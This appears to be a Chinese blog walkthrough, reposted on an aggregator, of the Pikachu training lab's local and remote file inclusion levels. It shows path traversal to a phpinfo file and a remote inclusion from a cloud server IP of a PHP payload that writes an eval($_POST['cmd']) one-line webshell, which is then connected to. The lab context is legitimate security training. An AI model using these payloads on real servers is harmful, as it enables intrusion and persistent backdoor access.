当前位置: 首页 > news >正文

pikachu文件包含漏洞靶场通关攻略

本地文件包含

首先,在靶场根目录下创建一个php文件,内容是phpinfo();

其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下

然后,将filename的参数改为可以访问到我们创建的php文件的地址

../../../../2.php

就可以访问到我们的phpinfo

远程文件包含

在进行远程文件包含时,要先修改两个参数

php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉

(看自己是什么版本的PHP,要和版本对应)

进行任意图片提交

在云服务器上创建一个2.txt文件  内容是

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

就是创建一个shell.php 文件,文件内容为一句话木马

然后,将filename的参数改为我们2.txt的地址

http://47.121.191.208/2.txt

回车后就可以在fileinclude目录下找到我们上传的shell.php文件

接下来使用连接工具进行webshell连接,成功连接


http://www.mrgr.cn/news/19123.html

相关文章:

  • B站视频自动驾驶master(2)
  • P01-Java何谓数组
  • 【MA35D1】buildroot 编译使用经验
  • flink窗口分组数据错乱
  • 笔记整理—uboot番外(2)find_cmd函数
  • Linux系统入门:加密与解密原理、数据安全及系统服务访问控制策略分析
  • @EnableAutoConfiguration注解使用和原理
  • glsl着色器学习(七)
  • malloc/free 和 new/delete的区别
  • 遇到bug怎么分析,这篇文章值得一看
  • Java学习|Java基础知识
  • C++11中的constexpr
  • 【网络】HTTPS协议
  • Python 从入门到实战6(二维列表)
  • 数据结构----链表
  • 实现一个简单的车贷计算小程序(含代码)
  • cocotb备忘录
  • Flink问题记录
  • 用 count(*)哪个存储引擎会更快?
  • SpringBoot学习(3)(配置文件的基本使用)